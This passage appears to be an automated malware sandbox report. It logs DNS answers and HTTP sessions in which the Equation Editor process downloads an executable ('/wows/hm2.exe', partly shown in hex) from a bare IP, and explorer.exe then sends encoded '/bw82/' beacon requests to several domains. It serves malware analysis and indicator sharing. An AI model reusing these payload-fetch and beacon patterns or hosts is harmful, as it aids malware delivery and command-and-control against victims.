                                                                                                                                                          Jan 27, 2021 20:07:56.543636084 CET8.8.8.8192.168.2.220xf09aNo error (0)www.ismaelworks.comismaelworks.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                          Jan 27, 2021 20:07:56.543636084 CET8.8.8.8192.168.2.220xf09aNo error (0)ismaelworks.com31.220.110.116A (IP address)IN (0x0001)

                                                                                                                                                          HTTP Request Dependency Graph

                                                                                                                                                          • 18.194.54.219
                                                                                                                                                          • www.kolamart.com
                                                                                                                                                          • www.mgg360.com
                                                                                                                                                          • www.rizrvd.com
                                                                                                                                                          • www.activagebenefits.net
                                                                                                                                                          • www.usmedicarenow.com
                                                                                                                                                          • www.ismaelworks.com

                                                                                                                                                          HTTP Packets

                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                          0192.168.2.224916518.194.54.21980C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                          Jan 27, 2021 20:06:16.158596992 CET0OUTGET /wows/hm2.exe HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                          Host: 18.194.54.219
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Jan 27, 2021 20:06:16.200130939 CET1INHTTP/1.1 200 OK
                                                                                                                                                          Date: Wed, 27 Jan 2021 19:06:06 GMT
                                                                                                                                                          Server: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.7
                                                                                                                                                          Last-Modified: Wed, 27 Jan 2021 13:44:29 GMT
                                                                                                                                                          ETag: "df000-5b9e1f85fb6d0"
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Content-Length: 913408
                                                                                                                                                          Keep-Alive: timeout=5, max=100
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Content-Type: application/x-msdownload
                                                                                                                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 ac 6d 11 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 e6 0d 00 00 08 00 00 00 00 00 00 9e 04 0e 00 00 20 00 00 00 20 0e 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 0e 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 48 04 0e 00 53 00 00 00 00 20 0e 00 e8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0e 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a4 e4 0d 00 00 20 00 00 00 e6 0d 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 e8 05 00 00 00 20 0e 00 00 06 00 00 00 e8 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 0e 00 00 02 00 00 00 ee 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 04 0e 00 00 00 00 00 48 00 00 00 02 00 05 00 20 34 0a 00 28 d0 03 00 03 00 00 00 42 00 00 06 38 52 04 00 e8 e1 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 41 1c 87 bd ac 04 65 6d 61 1a 99 ca f0 1d 0f da 48 e7 40 a0 df 6b 0d 26 58 55 c0 d2 55 96 02 08 67 e5 f9 dc 7f ed 8b af fb ec fe bf de f3 9f 11 8b ee 98 df 7c be 17 20 e7 cd ae fc 30 59 c8 bb cf d9 42 f1 1a 93 c4 67 3b c7 3d 99 90 d1 f0 79 be c1 23 df b5 62 7f ed 13 c7 ac 4a 9b ec 75 1a 38 9d 8f f6 8d 78 70 38 67 3d cb cb ca 1f af 1b c5 55 ee 2a 9b 41 cc f8 01 2f 6f 29 92 84 02 e8 8e f1 38 e9 e8 d7 39 7b 8d b2 61 89 d0 94 e7 3b 40 55 f5 31 93 82 4d 90 b5 20 3c 85 9d eb 2a 9f 90 74 94 29 df 08 81 82 99 52 47 f0 e2 ad 00 4f f6 ba bc 63 44 41 b2 e0 91 08 6c 02 c9 14 46 44 4e 1c 4a 70 73 eb 81 e8 3a 86 cd 64 46 9d 4b 50 24 9d 9d 71 db 32 07 4b 14 bc e9 b6 32 07 96 3d ae e7 c0 e0 2a 7c 2f b7 17 b2 16 af cd a6 9d 63 26 c1 4b a0 d8 5b e7 d0 e4 e2 bf 29 1c c4 9f 34 06 9c 1a a4 64 8d 55 a1 8f b8 3b 72 bf 60 a3 02 5d 92 e1 e2 8f 0e 98 7d da f7 de 35 16 f8 6b a3 64 34 33 fd 15 32 4c 2c 53 46 5f 23 47 1c 22 42 bb 88 ce f5 53 fc 70 f7 39 2b da 1c 96 a0 79 04 ca 5a 05 8b 8e 10 73 55 74 d6 37 cd 52 f6 4a ff 34 b0 a0 ea 7c fa 63 da 2e 11 cd 81 e3 c5 da a3 59 b6 42 34 1f fc d6 b8 40 b8 50 60 15 35 57 6e e9 4d 49 09 4d 85 3f 9a 5b 1f b7 c8 95 01 fc 42 55 2a 0e cc 87 44 88 53 ba a8 0b 10 a1 62 2f 70 de aa 52 0b f4 73 ba 4b cc 84 3d 0f f5 20 fe f2
                                                                                                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELm`P @ `@HS @ H.text `.rsrc @@.reloc@@BH 4(B8R(AemaH@k&XUUg| 0YBg;=y#bJu8xp8g=U*A/o)89{a;@U1M <*t)RGOcDAlFDNJps:dFKP$q2K2=*|/c&K[)4dU;r`]}5kd432L,SF_#G"BSp9+yZsUt7RJ4|c.YB4@P`5WnMIM?[BU*DSb/pRsK=


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                          1192.168.2.224916634.102.136.18080C:\Windows\explorer.exe
                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                          Jan 27, 2021 20:07:24.804033041 CET969OUTGET /bw82/?OxlhlP1x=U5qlNe3qvCiRDMVNZAk3bGcrOcPwpu2hHSyAkQWR0ho6UxGTq/9WR3TB3nENm+o2HqQ7BQ==&-Zz=NpM4AdWXGTqt_ry0 HTTP/1.1
                                                                                                                                                          Host: www.kolamart.com
                                                                                                                                                          Connection: close
                                                                                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                          Data Ascii:
                                                                                                                                                          Jan 27, 2021 20:07:24.943315983 CET969INHTTP/1.1 403 Forbidden
                                                                                                                                                          Server: openresty
                                                                                                                                                          Date: Wed, 27 Jan 2021 19:07:24 GMT
                                                                                                                                                          Content-Type: text/html
                                                                                                                                                          Content-Length: 275
                                                                                                                                                          ETag: "600b4d20-113"
                                                                                                                                                          Via: 1.1 google
                                                                                                                                                          Connection: close
                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                          2192.168.2.224916766.152.187.1780C:\Windows\explorer.exe
                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                          Jan 27, 2021 20:07:35.228283882 CET970OUTGET /bw82/?OxlhlP1x=92sn3P3pA19WcJiefsZEcwqQjW3QIGzSMGjo0scjbpzKmVTSJHG7E3+45hmGj5CVb2tavg==&-Zz=NpM4AdWXGTqt_ry0 HTTP/1.1
                                                                                                                                                          Host: www.mgg360.com
                                                                                                                                                          Connection: close
                                                                                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                          Data Ascii:
                                                                                                                                                          Jan 27, 2021 20:07:35.478817940 CET972INHTTP/1.1 404 Not Found
                                                                                                                                                          Server: nginx
                                                                                                                                                          Date: Wed, 27 Jan 2021 19:04:11 GMT
                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                          Connection: close
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          Data Raw: 31 63 31 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 53 79 73 74 65 6d 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2f 2a 20 42 61 73 65 20 2a 2f 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 3a 20 31 34 70 78 20 56 65 72 64 61 6e 61 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 68 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 27 4d 69 63 72 6f 73 6f 66 74 20 59 61 48 65 69 27 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 32 30 70 78 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 6f 72 64 2d 62 72 65 61 6b 3a 20 62 72 65 61 6b 2d 77 6f 72 64 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 68 31 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 30 70 78 20 30 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 35 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 33 32 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 68 32 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 32 38 38 63 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 70 78 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 36 70 78 20 30 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 65 65 65 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 68 33 2e 73 75 62 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 32 38 38 63 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 36 70 78 20 30 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 68 33 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 32 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 61 62 62 72 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 75 72 73 6f 72 3a 20 68 65 6c 70 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d
                                                                                                                                                          Data Ascii: 1c1f<!DOCTYPE html><html><head> <meta charset="UTF-8"> <title>System Error</title> <meta name="robots" content="noindex,nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no"> <style> /* Base */ body { color: #333; font: 14px Verdana, "Helvetica Neue", helvetica, Arial, 'Microsoft YaHei', sans-serif; margin: 0; padding: 0 20px 20px; word-break: break-word; } h1{ margin: 10px 0 0; font-size: 28px; font-weight: 500; line-height: 32px; } h2{ color: #4288ce; font-weight: 400; padding: 6px 0; margin: 6px 0 0; font-size: 18px; border-bottom: 1px solid #eee; } h3.subheading { color: #4288ce; margin: 6px 0 0; font-weight: 400; } h3{ margin: 12px; font-size: 16px; font-weight: bold; } abbr{ cursor: help; text-


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                          3192.168.2.224916834.102.136.18080C:\Windows\explorer.exe
                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                          Jan 27, 2021 20:07:40.616339922 CET979OUTGET /bw82/?OxlhlP1x=AJ+QNFfsTFGsedRB1oQHABBFVni950JEMBOKAlzmtW9JOrHkbqbPAoxgnlDKI2ECKqRl+w==&-Zz=NpM4AdWXGTqt_ry0 HTTP/1.1
                                                                                                                                                          Host: www.rizrvd.com
                                                                                                                                                          Connection: close
                                                                                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                          Data Ascii:
                                                                                                                                                          Jan 27, 2021 20:07:40.755337954 CET979INHTTP/1.1 403 Forbidden
                                                                                                                                                          Server: openresty
                                                                                                                                                          Date: Wed, 27 Jan 2021 19:07:40 GMT
                                                                                                                                                          Content-Type: text/html
                                                                                                                                                          Content-Length: 275
                                                                                                                                                          ETag: "600b4d54-113"
                                                                                                                                                          Via: 1.1 google
                                                                                                                                                          Connection: close
                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                          4192.168.2.224916934.102.136.18080C:\Windows\explorer.exe
                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                          Jan 27, 2021 20:07:45.866683960 CET980OUTGET /bw82/?OxlhlP1x=kkzs7wdh+d5Am/pShfiLHnYXY/z1ZZpbk/YksZMR2IH2vaFa+RYbCDDaBA0EFHNpIzx4Vw==&-Zz=NpM4AdWXGTqt_ry0 HTTP/1.1
                                                                                                                                                          Host: www.activagebenefits.net
                                                                                                                                                          Connection: close
                                                                                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                          Data Ascii:
                                                                                                                                                          Jan 27, 2021 20:07:46.006191015 CET981INHTTP/1.1 403 Forbidden
                                                                                                                                                          Server: openresty
                                                                                                                                                          Date: Wed, 27 Jan 2021 19:07:45 GMT
                                                                                                                                                          Content-Type: text/html
                                                                                                                                                          Content-Length: 275
                                                                                                                                                          ETag: "600b4d54-113"
                                                                                                                                                          Via: 1.1 google
                                                                                                                                                          Connection: close
                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                          5192.168.2.2249170198.185.159.14480C:\Windows\explorer.exe
                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                          Jan 27, 2021 20:07:51.262765884 CET981OUTGET /bw82/?OxlhlP1x=cQgJWKf5RX1pgHqtrNlNvU1Wcwt7yBWYkREyiU0JrpPbxB8OGrmWpa/gYGeP1DcG9D81oQ==&-Zz=NpM4AdWXGTqt_ry0 HTTP/1.1
                                                                                                                                                          Host: www.usmedicarenow.com
                                                                                                                                                          Connection: close
                                                                                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                          Data Ascii:
                                                                                                                                                          Jan 27, 2021 20:07:51.432032108 CET983INHTTP/1.1 400 Bad Request
                                                                                                                                                          Cache-Control: no-cache, must-revalidate
                                                                                                                                                          Content-Length: 77564
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Date: Wed, 27 Jan 2021 19:07:51 UTC
                                                                                                                                                          Expires: Thu, 01 Jan 1970 00:00:00 UTC
                                                                                                                                                          Pragma: no-cache
                                                                                                                                                          Server: Squarespace
                                                                                                                                                          X-Contextid: emTKCGIZ/j4jfctVx
                                                                                                                                                          Connection: close
                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 73 70 61 6e 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 31 31 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 65 6d 3b 0a 20 20 20 20
                                                                                                                                                          Data Ascii: <!DOCTYPE html><head> <title>400 Bad Request</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <style type="text/css"> body { background: white; } main { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); text-align: center; min-width: 95vw; } main h1 { font-weight: 300; font-size: 4.6em; color: #191919; margin: 0 0 11px 0; } main p { font-size: 1.4em; color: #3a3a3a; font-weight: 300; line-height: 2em; margin: 0; } main p a { color: #3a3a3a; text-decoration: none; border-bottom: solid 1px #3a3a3a; } body { font-family: "Clarkson", sans-serif; font-size: 12px; } #status-page { display: none; } footer { position: absolute; bottom: 22px; left: 0; width: 100%; text-align: center; line-height: 2em; } footer span { margin: 0 11px; font-size: 1em;


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                          6192.168.2.224917131.220.110.11680C:\Windows\explorer.exe
                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                          Jan 27, 2021 20:07:56.862134933 CET1000OUTGET /bw82/?OxlhlP1x=fbWA8CenQ3TkeqVhPkQUacOFLjWRhlcbsLRP5XQKQo+1RaQPyvftJQY27dLrrakP9R1/fg==&-Zz=NpM4AdWXGTqt_ry0 HTTP/1.1
                                                                                                                                                          Host: www.ismaelworks.com
                                                                                                                                                          Connection: close
                                                                                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                          Data Ascii:
                                                                                                                                                          Jan 27, 2021 20:07:57.176649094 CET1001INHTTP/1.1 404 Not Found
                                                                                                                                                          Connection: close
                                                                                                                                                          Content-Type: text/html
                                                                                                                                                          Last-Modified: Tue, 25 Jun 2019 07:06:32 GMT
                                                                                                                                                          Etag: "999-5d11c7f8-ec1f1fb6aaaaddbf;;;"
                                                                                                                                                          Accept-Ranges: bytes
